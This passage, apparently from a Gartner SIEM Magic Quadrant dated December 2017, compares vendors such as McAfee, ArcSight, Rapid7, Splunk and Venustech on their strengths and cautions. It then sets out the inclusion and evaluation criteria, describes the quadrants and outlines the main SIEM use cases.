  • Either ManageEngine Log360 or EventLog Analyzer is a good choice for existing ManageEngine customers looking for an integrated solution, as well as for organizations looking for a simple, cost-effective SIEM solution.
  • ManageEngine addresses heavy auditing and compliance capabilities. Over 1,200 predefined reports, including various compliance-focused ones, are available out of the box.
  • ADAudit Plus provides stand-alone or integrated monitoring of AD for identity and access governance requirements.
  • ManageEngine’s architecture and deployment are straightforward and easier to deploy than many SIEM solutions. Log360 includes a wide range of out-of-the-box correlation rules as well as threat intelligence feeds. Organizations primarily using Windows are well-supported with built-in log source identification and integration capabilities.
CAUTIONS
  • EventLog Analyzer only provides basic SIEM threat detection functionality. Support is lacking for third-party threat intelligence endpoints and for network-based traffic (e.g., NetFlow).
  • Log360 integrates EventLog Analyzer and ADAudit Plus; however, analysts are required to use two different interfaces to perform various activities, such as monitoring for new incidents, investigations and reporting.
  • Scalability of the platform may present challenges for larger organizations. Buyers should confirm that event and data volumes, and AD sizes, are supported. Horizontal scaling is supported, but n-tier scalability may be a challenge.
  • ManageEngine buyers report difficulty working with remote support staff after purchase.
  • ManageEngine has little visibility with Gartner clients for SIEM use cases.

McAfee

McAfee Enterprise Security Manager (ESM) provides core SIEM functionality, including a web-based user interface, a parsed event database, reporting capabilities and central management of other components in the solution. The other components in the solution include Event Receiver (ERC), which provides event and flow collection, and event parsing and normalization; Enterprise Log Manager (ELM), which collects, manages and stores all raw events; Advanced Correlation Engine (ACE), which provides real-time analytics using four types of correlation approaches (rule-based, risk-based, statistical and historical); and Enterprise Log Search (ELS) for log search functionality. Buyers can also purchase the McAfee Database Event Monitor (DEM), which provides real-time discovery and transaction-level database monitoring; Application Data Monitor (ADM), which provides application-level (e.g., Layer 7) decoding and inspection of network traffic; and Global Threat Intelligence (GTI), a threat intelligence feed produced by McAfee Labs. The McAfee SIEM can be deployed as physical or virtual appliances, either as an all-in-one offering (where ESM, ELM and ERC components are on a single appliance) or as individual, discrete components. Physical and virtual appliances can be run together in hybrid-type deployments. The flexible deployment options support n-tier architectures. McAfee’s SIEM solution is licensed as a perpetual model, primarily by maximum event volume per appliance as measured in EPS. Physical appliances are an additional charge. McAfee ADM is licensed by bandwidth in gigabytes per second and GTI is licensed per ESM server deployed.

Over the last year, McAfee has primarily focused on transitioning the ESM underlying architecture to a big data-based approach that leverages technologies like Elastic and Kafka, which is supported with the release of a new generation of physical appliances (although many earlier appliance models support the new architecture too). Additionally, the user experience was also addressed via a new HTML5-based interface that included improved visualizations and workflow capabilities (although the interface is not yet 100% available across the entire solution). Forensics capabilities were improved via the release of ELS.

STRENGTHS
  • McAfee’s architecture and licensing approach, especially for buyers looking for turnkey appliances (both physical and virtual), simplifies purchases and deployments.
  • Customers of other McAfee products, as well as the large set of vendors that are part of the McAfee Security Innovation Alliance, will benefit from native integrations as well as interoperability provided by the Data Exchange Layer (DXL) framework.
  • Organizations that require SEM of OT environments (ICS/SCADA) should consider ESM and ADM due to a long history of supporting OT environments (e.g., being able to run as a “one-way diode”) and through specific prepackaged content (rules, dashboards and reports).
  • Customer satisfaction, with both the product and support, over the past 12 months has improved compared to previous periods.
CAUTIONS
  • McAfee lacks advanced, machine-driven analytics capabilities, compared to leading competitors. The planned changes to the platform to run on a big data architecture should enable development of these capabilities.
  • McAfee ESM has workflow and case management, but is lacking in automation and orchestration capabilities. Support for many third-party SOA tools is available.
  • Customers report ongoing concerns about options for training and education on the ESM platform.

Micro Focus (ArcSight)

In September 2017, Hewlett Packard Enterprise (HPE) and Micro Focus closed a business transaction that resulted in the ArcSight SIEM product becoming part of the Micro Focus business. ArcSight Enterprise Security Manager (ESM) is the core component of ArcSight’s SIEM solution. Data collection and management is enabled by ArcSight Data Platform (ADP) using HDFS, Kafka, and Logger and Connectors (both prepackaged SmartConnectors and customizable FlexConnectors). The ArcSight Management Center (ArcMC) handles configuration management. ESM provides real-time analytics and monitoring, search, reporting, case management, and workflow. ArcSight ESM Express is available for single, all-in-one system implementations. ArcSight Investigate, built on top of Micro Focus Vertica, is a purpose-built big data and analytics platform that enables data search for incident investigation as well as threat hunting uses. UBA is possible via a repackaged version of Securonix Bolt that provides advanced analytics-based user monitoring capabilities (peer group analysis and ML). DNS Malware Analytics (DMA) is a SaaS-delivered solution that applies advanced analytics to DNS events to detect malware-infected hosts. DMA will be incorporated into the next release of ArcSight Investigate. The solution can be deployed as a physical appliance or as software, with bare-metal, virtual and IaaS options supported. Multitenant functionality is native to the platform.

STRENGTHS
  • ArcSight has a large installed base of customers using the SIEM product for large, complex SOC environments and for more basic log collection use cases. There is widespread professional services and third-party monitoring support for ArcSight.
  • ArcSight supports acquisition and parsing of data from a broad range of sources, connector customization that allows normalization of a broad range of event sources and an open platform that enables structured data to be used outside of the ArcSight solution.
  • ArcSight can be extensively customized to support threat management and compliance-focused use cases. ArcSight’s robust API enables extensive integrations in SOC environments.
CAUTIONS
  • Prior to the acquisition by Micro Focus, ArcSight was updating several elements of its architecture. ArcSight users and prospective customers should seek assurances that Micro Focus will meet commitments for product feature/function improvements and support. Since closing the merger with HPE, Micro Focus has stated that its current plan is to continue investment in ArcSight, leveraging the combined expertise and technology from the legacy companies for the foreseeable future.
  • Licensing may be problematic for buyers, with volume-based (for ADP), velocity-based (for ESM) and user-based (for UBA) pricing schemes. Current customers that are converting from legacy licensing models to new licenses and the ADP architecture have reported issues with license conversion complexity and costs. To address these concerns, Micro Focus has implemented changes to its license model that include a pricing option that is free of data restrictions.
  • The ArcSight architecture is undergoing changes, with the introduction of ADP, Investigate and other components to support scalable, richer analytics and response, while at the same time supporting legacy functionality. As a result, customer choices regarding the deployment of some elements of the solution can result in duplication of data.

Micro Focus (NetIQ)

NetIQ Sentinel is a SIEM solution from Micro Focus. Sentinel Enterprise is the full SIEM solution that provides SIM and SEM capabilities to support both threat detection- and compliance-oriented use cases. Sentinel for Log Management provides log management, search and reporting capabilities, and can be upgraded to Enterprise. Additional components in the platform include Identity Tracking (a combined solution of Micro Focus Identity Manager and Sentinel with user-monitoring-focused content), Change Guardian (for host-based change and file monitoring), Exploit Detection (a threat and vulnerability management intelligence subscription), Secure Configuration Manager, and Aegis (for enhanced automation to the native Sentinel iTrace workflow). Sentinel can be deployed as software on Linux or as a virtual appliance on VMware, Hyper-V and Xen, and allows for flexible horizontal scaling. Sentinel is licensed based on EPS, event sources and optional components. Multitenant capabilities are natively supported.

Over the past 12 months, Micro Focus introduced Sentinel version 8 that includes an optional big data storage back end built on Cloudera Hadoop and Threat Response Dashboard. Other functional and operational enhancements were also added.

STRENGTHS
  • Sentinel Enterprise supports organizations that have large-scale deployment requirements underpinned by core SIEM capabilities, along with native workflow and automation capabilities.
  • Tight integration between Micro Focus’ IAM, SIEM and IT operations tools provides organizations with a single view into user activity across the IT environment.
  • Sentinel’s Hadoop-based log management tier provides flexible and horizontally scalable data collection, along with support for third-party solutions that can integrate with data from Hadoop platforms (e.g., UEBA tools).
  • Sentinel’s architecture is one of the simpler solutions to deploy and manage compared to competing products. Scaling and distribution only require installation of more Sentinel instances.
CAUTIONS
  • The merger of Micro Focus and the software business from HPE resulted in ArcSight SIEM technology becoming part of Micro Focus. Users and prospective buyers should seek assurances from Micro Focus regarding roadmaps. Since closing the merger with HPE, Micro Focus has stated that its current plan is to continue investment in Sentinel and ArcSight, leveraging the combined expertise and technologies from both for the foreseeable future.
  • Advanced analytics in Sentinel are lagging compared to competing SIEM solutions. However, support for Hadoop-based event and data management should make integration with stand-alone UEBA solutions easier.
  • Support for log and event data collection and monitoring for SaaS, such as Office 365, Salesforce and Box, is lacking.
  • Integration of third-party solutions and content is provided, but the lack of an app store experience makes it less user-friendly than competitive products.
  • Micro Focus NetIQ Sentinel has low visibility with Gartner clients in competitive evaluations of SIEM platforms.

Rapid7

InsightIDR is Rapid7’s SIEM solution that is delivered as a service via the Insight platform. The solution consists of the InsightIDR service, EDR agents and honeypots. InsightIDR provides core SIEM features like log collection and management, threat detection rules and correlations, advanced analytics, dashboards, case management, and workflow and reporting. InsightIDR is built on Rapid7’s UserInsight (now InsightUBA) UEBA solution and the acquisition of Logentries. Advanced analytics with a focus on user behavior is a core component of InsightIDR. Buyers deploying the solution will need to install Collectors, available for Windows server or Linux and usually deployed in a ratio of one per location (physical and IaaS), to collect, aggregate and forward logs to the InsightIDR platform. The EDR agents also support local event log forwarding. Scalability is managed by Rapid7. Rapid7’s managed detection and response (MDR) service provides 24/7 SEM for buyers that require a service overlay. InsightIDR is licensed by annual subscriptions based on the number of monitored assets, which is any device connected to the buyer’s network that generates security data (e.g., desktops, laptops, tablets and servers). Data retention is 90 days, but extended data storage can be added for an additional charge.

STRENGTHS
  • InsightIDR is delivered as a service, so the architecture and implementation are simplified. Ongoing maintenance of the platform (performance management, upgrades, scaling) is not required of the user, as it is fully managed by Rapid7.
  • Advanced analytics, particularly UEBA, is provided as part of the core solution.
  • Monitoring and responding to alerts is supported by the guided investigation feature, making it easier for less experienced users to leverage the solution.
  • EDR and honeypot technology are included with the price of the solution, allowing users to leverage advanced threat detection technologies along with InsightIDR.
CAUTIONS
  • InsightIDR is relatively new to the SIEM solution market and is less feature-rich compared with more mature SIEM solutions in areas such as reporting and the number of supported log event and data sources (but popular SaaS vendors are natively supported).
  • Workflow and case management is basic, and there is a lack of orchestration and response features. Rapid7 acquired an IT operations and security orchestration and automation company, Komand, in July 2017, which could address this gap in the future.
  • The as-a-service model may not meet the requirements of all buyers. There is no on-premises version of the solution available to buyers that have concerns about transmitting data and that data being stored off-premises. If network connectivity to Rapid7 is impaired, availability to the solution will be affected.

Securonix

Securonix’s SIEM platform is branded as Snypr Security Analytics and runs on top of a Hadoop big data platform. Snypr incorporates an event and data collection and management tier; advanced analytics that include native UEBA functionality as well as a threat library of traditional signatures and rules; and case management and workflow functions. Snypr components include the Console, which provides the UI and configuration functions; Search Service for indexing and searching across all stored data; Enrichment Service for handling data parsing, normalization and event enrichment; Correlation Service for correlation rules; Behavior Science for ML analytics; Risk Scoring Service for threat modeling and indicator-based analytics; Storage Service; Indexing Service; Centralized Ingestion Service; and Ingesters for collecting and forwarding data to the Centralized Ingestion Service. Premium apps include prepackaged behavior models, rules, reports and dashboards across a variety of security monitoring use cases, such as privileged account misuse, data security, cyberthreats, access, application security, cloud security and fraud. Advanced incident investigation and threat hunting requirements are supported by Securonix’s Spotter capability. Snypr can be deployed in a variety of ways, including as software that includes the Hadoop environment, or as software that can use a buyer’s existing Hadoop environment. For faster implementations, both physical appliance and hosted as-a-service options are available. Securonix licenses the solution as a term model based on the number of users in an organization, for both Snypr and the premium content apps.

Over the past 12 months, Securonix added improvements around SEM, such as use-case-specific packaged content; enhancements in dashboard features and functionality that help address compliance-, threat- and operational-driven uses; the Securonix Threat Model Exchange for users to share use-case content from a central community-driven location; and the introduction of an as-a-service option.

STRENGTHS
  • Securonix Snypr provides both rule-based and UEBA capabilities as part of the core platform.
  • The Securonix licensing model is straightforward and easy for buyers to understand.
  • Securonix has a large set of partners and supports a wide variety of third-party solutions out of the box, including endpoint protection platforms, data loss prevention, cloud access security brokers, firewalls, healthcare solutions and access management solutions.
CAUTIONS
  • Native workflow and case management is relatively basic. More advanced orchestration and automation capabilities are available through API connection. Integrations with third-party solutions, such as ServiceNow, Jira and Remedy service desk solutions, are supported, as well as SOAR solutions like Microsoft-Hexadite and Phantom.
  • Since Snypr runs on a commercial Hadoop platform, it introduces a different architecture compared to more traditional SIEM solutions, and may require a learning curve to understand how to manage, monitor and troubleshoot the various components running on the platform (e.g., Kafka, Solr, HBase, Spark, HDFS, etc.).
  • Securonix lacks native advanced threat defense solutions, relying on integrations with third-party solutions for those functions (e.g., host and network forensics).

SolarWinds

SolarWinds Log & Event Manager (LEM) provides SEM and SIM functionality delivered as a virtual appliance for VMware and Hyper-V platforms. SolarWinds LEM is composed of Manager, which provides central management of the overall solution as well as log and event management and storage; Console, which provides the user interface; and Agents. The LEM Agents provide real-time event collection from endpoints, handle encryption and compression of data sent to the Manager, and also provide basic DLP (called USB Defender), FIM and automated, active response capabilities. Support for other security monitoring and context sources, such as network traffic, application and virtualized platform monitoring, is available through other SolarWinds solutions such as Virtualization Manager, Network Performance Monitor, and Server & Application Monitor. SolarWinds LEM is licensed per number of event source nodes and includes all components, including Agents and threat intelligence feeds.

Over the past 12 months, SolarWinds added multifactor authentication to the Console, along with feature and functionality upgrades for new device and application event sources. The vendor also improved capabilities for monitoring LEM health through other SolarWinds applications.

STRENGTHS
  • SolarWinds LEM provides a well-integrated solution across a variety of IT operation capabilities, making it a good option for SMBs where security operations responsibilities are federated across IT teams and staff.
  • LEM supports a variety of event sources, including nonevent data sources that can be integrated into its analytics and correlation rules.
  • SolarWinds’ simple architecture, easy licensing, and robust out-of-the-box content and features — some found in more complex SIEM solutions — make it a good fit for SMB security operations and compliance use cases.
  • The automated response capability based on the endpoint agent for Windows provides some threat containment and quarantine control capabilities not normally found with many competing SIEM solutions.
  • SolarWinds has moderate visibility with Gartner clients, particularly midsize and smaller enterprise clients.
CAUTIONS
  • SolarWinds LEM is a closed ecosystem, limiting the ability to integrate it with third-party security solutions, particularly advanced threat detection, threat intelligence feeds and UEBA tools. Integrations with service desk tools are also limited to one-way connectivity via email and SNMP.
  • LEM’s architecture scales horizontally to support thousands of nodes, but it doesn’t scale vertically and has an event data storage limit, which the vendor plans to address in a future release.
  • Monitoring of SaaS is not supported, and monitoring of IaaS is limited. Buyers that wish to extend monitoring to networks and applications must purchase other SolarWinds solutions to address those requirements.

Splunk

Splunk’s Security Intelligence Platform is composed of Splunk Enterprise and two premium solutions, Enterprise Security (ES) and Splunk User Behavior Analytics (UBA). Splunk Enterprise is the core component of the product, providing event and data collection, a variety of analytics capabilities, search, and visualizations. Splunk Enterprise (aka Core Splunk) and Splunk Cloud provide use-case-agnostic data analysis capabilities that are used for various purposes like IT operations, application and network performance monitoring, business intelligence, and some security use cases. The premium ES solution delivers most of the security-monitoring-specific capabilities, including prepackaged security-specific queries, visualizations and dashboards, as well as case management, workflow and incident response capabilities. UBA adds machine-driven, advanced analytics that complement the query-oriented approach of ES. Splunk offers a variety of complementary apps for security use cases, made available through Splunkbase. Example apps include App for PCI Compliance; Stream, which ingests network packet data directly off the wire; Analytics for Hadoop (formerly Hunk), which integrates Splunk with Hadoop environments; and Machine Learning Toolkit for users that want to create their own ML-driven analytics. Splunk supports a variety of deployment options, such as software that can be run on-premises, in IaaS and as a hybrid model. Splunk Cloud is a Splunk-hosted and -operated SaaS solution using AWS infrastructure. Core Splunk and Splunk Cloud components consist of Universal Forwarders, Indexers and Search Heads supporting n-tier architectures, as well as multiple use cases and premium solutions. Splunk is licensed based on the amount of data ingested into the platform, measured in gigabytes per day. ES is also licensed by gigabytes per day, whereas UBA is licensed by the number of user accounts in an organization, and all these are available either as a perpetual or term license.

Over the past 12 months, Splunk has primarily delivered a variety of performance and usability enhancements to Core, ES and UBA. Splunk introduced a new open-visualization approach and the Machine Learning Toolkit app that supports user-generated, machine-based analytics. Support for Okta, Azure AD and ADFS was added. Enhancements were also made to the incident response features in ES (called Adaptive Response), further enabling orchestration and automated response capabilities. Improved integration between ES and UBA events, alerts and identity resolution were also added.

STRENGTHS
  • Splunk provides a full suite of solutions oriented toward SEM that allow users to grow into the platform over time (e.g., starting with Core, then adding ES and UBA).
  • Advanced analytics capabilities are available through a variety of means across the Splunk ecosystem (e.g., built into the core search capabilities, with Machine Learning Toolkit, prepackaged in UBA or via third-party app providers).
  • Splunk has a large partner ecosystem that provides integration and Splunk-specific content that is made available through the Splunkbase application store.
  • Many organizations start implementing Splunk for other use cases, easing the path for security teams looking to add a SIEM solution to their environment as the core infrastructure and event log sources are already in place.
  • Splunk has significant visibility with Gartner clients, consistently appearing on buyers’ shortlists.
CAUTIONS
  • Gartner clients that have implemented Splunk consistently raise concerns about the licensing model and overall cost to implement the solution. Splunk has introduced new licensing approaches, such as the Enterprise Adoption Agreement (EAA) as well as additional license headroom for new users with periodic license true-ups, to address these concerns.
  • Splunk UBA is visible on shortlists of Splunk users seeking to add UEBA features, but competes with other UEBA solutions, some of which also offer SIEM functionality. Buyers considering using Splunk for SIEM and a third-party solution for UEBA must validate the degree of integration of the solutions and assess the commitment of the respective vendors to continued integration.
  • Splunk does not offer an appliance version of the solution. Organizations that want an on-premises appliance version must work with a Splunk partner that provides the integration on supported hardware.

Trustwave

Trustwave’s SIEM solution is composed of two versions — SIEM Enterprise and Log Management Enterprise (LME). Both products complement their broader security solution offerings across network, endpoint, and content and data security. Customers consuming SIEM Enterprise as a service leverage the local collector appliance (LCA). The SIEM Enterprise solution is composed of the following components: DA or LCA for event and data collection and normalization; Threat Detection and Threat Evaluation (TD&TE) for real-time analytics and alerting; and the Secure Data Warehouse (SDW) for data storage and historical analysis. SIEM Enterprise, LME and LCA can be deployed as physical or virtual appliances. The architecture can run as an all-in-one solution, and can scale both horizontally and vertically across on-premises and IaaS environments (e.g., a hybrid approach). Trustwave offers a variety of co-managed or hybrid services augmenting its security management products. Trustwave’s licensing is primarily based on appliance costs and velocity of events processed per day (EPD). Services are charged based on the size of the SIEM environment, and the number and types of event sources.

Over the past 12 months, Trustwave has made additions and enhancements to the core platform, primarily around event collection and parsing; connectivity to cloud-based services; added support for deployment in AWS, Azure and CenturyLink; and improved storage capabilities and security.

STRENGTHS
  • Trustwave has built integrations across its security product portfolio, making its SIEM a viable option for customers of other Trustwave security products.
  • Trustwave offers flexible deployment and service options, including co-management and hybrid deployments, which are a good fit for midmarket organizations and buyers with diverse IT environments (across geographies, on-premises and IaaS).
  • SIEM Enterprise has good out-of-the-box support for event and data sources, as well as reports across a variety of regulatory and security frameworks.
  • SIEM Enterprise provides core SEM and SIM capabilities that can support both small environments and large organizations and MSSPs requiring multitenant support.
  • Midmarket customers can adopt LME and then grow into SIEM Enterprise via a simple license key upgrade.
CAUTIONS
  • Trustwave SIEM Enterprise lags the competition in integration with third-party security solutions. The addition of RESTful API support, which Trustwave added this year, should make this easier in the future.
  • SIEM Enterprise lacks advanced analytics and user-behavior-based analytics, as well as integration with big data solutions and stand-alone UEBA solutions.
  • Threat intelligence feeds are not provided out of the box. Buyers must add on Trustwave SpiderLabs research team feeds as a premium. Native SIEM integration with third-party threat intelligence feeds is not directly supported.
  • Trustwave has little visibility in competitive evaluations of SIEM solutions among Gartner clients.

Venustech

The Venustech SIEM solution is composed of various components under the Venusense Unified Security Management (USM) product, which includes modules for Security Analytics (SA), Network Behavior Analysis (NBA), Configuration Verification System (CVS) and Business Security Management (BSM). Venusense SA provides log collection, normalization and storage, and an analytics engine for threat detection and compliance use cases. It is based on a big data platform, with both Hadoop and Elasticsearch options available, that enables ML analytics in addition to standard correlation-based detection. The solution can be deployed via software, or as a virtual or physical appliance (the NBA solution is only available as a physical appliance). Venustech also offers a variety of security technologies in addition to its SIEM solution, focused on the Chinese and Asia/Pacific region markets, with solutions that cover firewalls and UTMs, web application firewalls, intrusion detection, vulnerability scanning, VPN, and other products. The solution is licensed by the core product version (back-end data tier), number of data source nodes and add-on functional modules.

Over the past year, Venustech introduced a number of new capabilities and enhancements, including its big data architecture and new UI based on HTML5, support for OT/ICS environments, and a new version of its NBA tool.

STRENGTHS
  • Venustech is a good solution for Chinese organizations, both midsize and enterprise-sized, and buyers in the Asia/Pacific markets where Venustech’s security solutions are used. Both Chinese and English are supported out of the box.
  • Venustech’s SIEM solution provides core SEM and SIM functionality that can be expanded to address a variety of network-based monitoring, as well as other security operations and risk management capabilities.
  • The Venustech SIEM architecture is straightforward and offers flexible, horizontal scaling.
  • Venustech’s SIEM solution provides a variety of data management tiers to fit different buyer types (e.g., midsize versus large enterprises).
  • Advanced analytics using ML for modeling network-based entity behavior is provided out of the box.
CAUTIONS
  • Venustech’s SIEM solution lacks the ability to monitor IaaS and SaaS solutions popular outside of the Chinese market, such as AWS, Azure, Office 365, Box and Salesforce. Support is provided for Alibaba Cloud and Tencent Cloud environments.
  • Venustech offers three versions of data management to support small- to large-scale deployments. Potential customers must understand the use cases and data volumes they need to support in order to choose the appropriate data management architecture.
  • The number of out-of-the-box parsers and report templates, especially regulatory reports outside those needed by Chinese organizations, is smaller than that of competing SIEM solutions.
  • Venustech has little visibility with Gartner clients, including those in the Asia/Pacific region, relative to other competing SIEM solutions.

Vendors Added and Dropped

We review and adjust our inclusion criteria for Magic Quadrants as markets change. As a result of these adjustments, the mix of vendors in any Magic Quadrant may change over time. A vendor’s appearance in a Magic Quadrant one year and not the next does not necessarily indicate that we have changed our opinion of that vendor. It may be a reflection of a change in the market and, therefore, changed evaluation criteria, or of a change of focus by that vendor.

Added

  • Exabeam
  • FireEye
  • Rapid7
  • Securonix
  • Venustech

Dropped

No vendors were dropped from this Magic Quadrant.

Inclusion and Exclusion Criteria

The inclusion criteria represent the specific attributes that analysts believe are necessary for inclusion in this research.

To qualify for inclusion:

  • The product must be generally available and provide SIM and SEM capabilities.
  • The product must support data capture from heterogeneous data sources, including network devices, security devices, security programs and servers.
  • The vendor must appear on the SIEM product evaluation lists of end-user organizations.
  • The solution must be delivered to the customer environment as a software- or appliance-based product or in an as-a-service model.
  • SIEM revenue (net-new license revenue plus maintenance) must be at least $15 million for 2016.

Evaluation Criteria

Ability to Execute

  • Product or Service evaluates the vendor’s ability and track record to provide product functions in areas such as real-time security monitoring, security analytics, incident management and response, reporting, and deployment simplicity.
  • Overall Viability includes an assessment of the technology provider’s financial health, the financial and practical success of the overall company, and the likelihood that the technology provider will continue to invest in SIEM technology.
  • Sales Execution/Pricing evaluates the technology provider’s success in the SIEM market and its capabilities in presales activities. This includes SIEM revenue and the installed base size, growth rates for SIEM revenue and the installed base, presales support, and the overall effectiveness of the sales channel. The level of interest from Gartner clients is also considered.
  • Market Responsiveness/Record evaluates the match of the SIEM offering to the functional requirements stated by buyers at acquisition time, and the vendor’s track record in delivering new functions when they are needed by the market. Also considered is how the vendor differentiates its offerings from those of its major competitors.
  • Marketing Execution evaluates the SIEM marketing message against our understanding of customer needs, and also evaluates any variations by industry vertical or geographic segments.
  • Customer Experience is an evaluation of product function and service experience within production environments. The evaluation includes ease of deployment, operation, administration, stability, scalability and vendor support capabilities. This criterion is assessed by conducting surveys of vendor-provided reference customers, in combination with feedback via inquiry, Peer Insights and other interactions from Gartner clients that are using or have completed competitive evaluations of the SIEM offering.
  • Operations is an evaluation of the organization’s service, support and sales capabilities, and includes an evaluation of these capabilities across multiple geographies.

Table 1.   Ability to Execute Evaluation Criteria

Evaluation Criteria            Weighting
Product or Service             High
Overall Viability              High
Sales Execution/Pricing        High
Market Responsiveness/Record   High
Marketing Execution            Medium
Customer Experience            High
Operations                     High

Source: Gartner (December 2017)

Completeness of Vision

  • Market Understanding evaluates the ability of the technology provider to understand current and emerging buyer needs and to translate those needs into products and services. SIEM vendors that show the highest degree of market understanding are adapting to customer requirements in areas such as early targeted attack and breach detection, and simplified implementation and operation, while also meeting compliance reporting requirements.
  • Marketing Strategy evaluates the vendor’s ability to effectively communicate the value and competitive differentiation of its SIEM offering.
  • Sales Strategy evaluates the vendor’s use of direct and indirect sales, marketing, service, and communications affiliates to extend the scope and depth of market reach.
  • Offering (Product) Strategy is an evaluation of the vendor’s approach to product development and delivery that emphasizes functionality and feature sets as they map to current requirements. Development plans during the next 12 to 18 months are also evaluated. Because the SIEM market is mature, there is little differentiation between most vendors in areas such as support for common network devices, security devices, OSs and consolidated administration capabilities. In this evaluation, we neutralized the relative evaluations of vendors with capabilities in these areas, but there would be a severe “vision penalty” (that is, a lower rating on the Completeness of Vision axis) for a vendor that has shortcomings in this area. We continue to place greater weight on current capabilities that aid in targeted attack detection, including:
    • Vendor capabilities for profiling and anomaly detection to complement existing rule-based correlation.
    • Threat intelligence and business context integration, including automated updates, filtering, and usage within rules, alerts and reports.
    • User monitoring capabilities, including monitoring of administrative policy changes and integration with IAM technologies, for automated import of access policy (user context) for use in monitoring. We also evaluate predefined analytics for user behavior analysis.
    • Data access monitoring capabilities, which include direct monitoring of database logs and integration with database audit and protection products, DLP integration, and FIM through native capability and integration with third-party products.
    • Application layer monitoring capabilities, including integration with third-party applications (for example, ERP financial and HR applications, and industry vertical applications), for the purpose of user activity and transaction monitoring at that layer; the external event source integration interface that is used to define normalizers and parsers for the log formats of an organization’s in-house-developed applications; and the ability to derive application context from external sources.
    • Analytics, an important capability to support the early detection of targeted attacks and breaches. SIEM vendors have long provided query capabilities against the primary storage tiers of SIEM technology. In order to be effective for early breach detection, the analytics capability must incorporate context about users, assets, threats and network activity, and must also provide query performance that supports an iterative approach to investigation. Some SIEM vendors have introduced separate data stores to hold very large amounts of security event, content and contextual data, optimized for applying advanced analytics. A number of SIEM vendors have also built connectors from the SIEM technology to industry-standard big data repositories.
    • Inclusion of advanced threat detection, endpoint and network traffic monitoring, and packet capture capabilities, and integration with third-party technologies that provide these functions for more effective early breach detection.
  • Despite the vendor focus on expansion of capability, we continue to heavily weight simplicity of deployment and ongoing support. Users, especially those with limited IT and security resources, still value this attribute over breadth of coverage beyond basic use cases. SIEM products are complex and tend to become more so as vendors extend capabilities. Vendors that are able to provide effective products that users can successfully deploy, configure and manage with limited resources will be the most successful in the market.
  • We evaluate options for co-managed or hybrid deployments of SIEM technology and supporting services because a growing number of Gartner clients are anticipating or requesting ongoing service support for monitoring or managing their SIEM technology deployments.
  • Vertical/Industry Strategy evaluates vendor strategies to support SIEM requirements that are specific to industry verticals.
  • Innovation evaluates the vendor’s development and delivery of SIEM technology that is differentiated from the competition in a way that uniquely meets critical customer requirements. Product capabilities and customer use in areas such as application layer monitoring, fraud detection and identity-oriented monitoring are evaluated, in addition to other capabilities that are product-specific and needed and deployed by customers. There is a strong weighting of capabilities that are needed for advanced threat detection and incident response: user, data and application monitoring, ad hoc queries, visualization, orchestration and incorporation of context to investigate incidents, and workflow/case management features. There is also an evaluation of capabilities for monitoring cloud environments.
  • For Geographic Strategy, although the North American and European markets produce the most SIEM revenue, Latin America and the Asia/Pacific region are growth markets for SIEM and are driven primarily by threat management and secondarily by compliance requirements. Our overall evaluation of vendors in this Magic Quadrant includes an evaluation of vendor sales and support strategies for those geographies.

Table 2.   Completeness of Vision Evaluation Criteria

Evaluation Criteria            Weighting
Market Understanding           High
Marketing Strategy             Medium
Sales Strategy                 Medium
Offering (Product) Strategy    High
Business Model                 Not Rated
Vertical/Industry Strategy     Medium
Innovation                     High
Geographic Strategy            Medium

Source: Gartner (December 2017)

Quadrant Descriptions

Leaders

The SIEM Leaders quadrant is composed of vendors that provide products that are a strong functional match to general market requirements, have been the most successful in building an installed base and revenue stream within the SIEM market, and have a relatively high viability rating (due to SIEM revenue or SIEM revenue in combination with revenue from other sources). In addition to providing technology that is a good match to current customer requirements, Leaders also show evidence of superior vision and execution for emerging and anticipated requirements. They typically have relatively high market share and/or strong revenue growth, and have demonstrated positive customer feedback for effective SIEM capabilities and related service and support.

Challengers

The Challengers quadrant is composed of vendors that have multiple product and/or service lines, at least a modest-size SIEM customer base, and products that meet a subset of the general market requirements. As the SIEM market continues to mature, the number of Challengers has dwindled. Vendors in this quadrant would typically have strong execution capabilities, as evidenced by financial resources, a significant sales and brand presence garnered from the company as a whole, or from other factors. However, Challengers have not demonstrated a complete set of SIEM capabilities or they lack the track record for competitive success with their SIEM technologies, compared with vendors in the Leaders quadrant.

Visionaries

The Visionaries quadrant is composed of vendors that provide products that are a strong functional match to general SIEM market requirements, but have a lower Ability to Execute rating than the Leaders. This lower rating is typically due to a smaller presence in the SIEM market than the Leaders, as measured by installed base or revenue size or growth, or by smaller overall company size or general viability.

Niche Players

The Niche Players quadrant is composed primarily of vendors that provide SIEM technology that is a good match to a specific SIEM use case or a subset of SIEM functional requirements. Niche Players focus on a particular segment of the client base (such as the midmarket, service providers, or a specific geographic region or industry vertical) or may provide a more limited set of SIEM capabilities. In addition, vendors in this quadrant may have a small installed base or be limited, according to Gartner’s criteria, by a number of factors. These factors may include limited investments or capabilities, a geographically limited footprint, or other inhibitors to providing a broader set of capabilities to enterprises now and during the 12-month planning horizon. Inclusion in this quadrant does not reflect negatively on the vendor’s value in more narrowly focused markets or use cases.

Context

SIEM technology provides:

  • SIM — Log management, analytics and compliance reporting
  • SEM — Real-time monitoring and incident management for security-related events from networks, security devices, systems and applications

SIEM technology is typically deployed to support three primary use cases:

  • Advanced threat detection — Monitoring, alerting in real time, and longer-term analysis and reporting of trends and behaviors regarding user activity, data access, and application activity. Threat detection includes incorporation of threat intelligence and business context, in combination with effective ad hoc query capabilities.
  • Basic security monitoring — Log management, compliance reporting and basic real-time monitoring of selected security controls.
  • Investigation and incident response — Dashboards and visualization capabilities, as well as workflow and documentation support to enable effective incident identification, investigation and response.

Organizations should define their specific functional and operational requirements, and consider SIEM products from vendors in every quadrant of this Magic Quadrant. Product selection decisions should be driven by organization-specific requirements in areas such as the relative importance of basic capabilities versus advanced features; budget constraints; the scale of the deployment; complexity of product (deploying, running, using and supporting); the IT organization’s project deployment and technology support capabilities; and integration with established applications, data monitoring and identity management infrastructure (see “Toolkit: Security Information and Event Management RFP”).

Security and risk management leaders considering SIEM deployments should first define the requirements for SEM and reporting. The requirements definition should include capabilities that will be needed for subsequent deployment phases. The project will benefit from the input of other groups, including audit/compliance, identity administration, IT operations and application owners (see “How to Deploy SIEM Technology”). Organizations should also describe their network and system deployment topology, and assess event rates, so that prospective SIEM vendors can propose solutions for company-specific deployment scenarios. The requirements definition effort should also include phased deployments and enhancements beyond the initial use cases. This Magic Quadrant evaluates technology providers with respect to the most common technology selection scenario — a SIEM project that is funded to satisfy a combination of threat monitoring/detection/response and compliance reporting requirements.

Market Overview

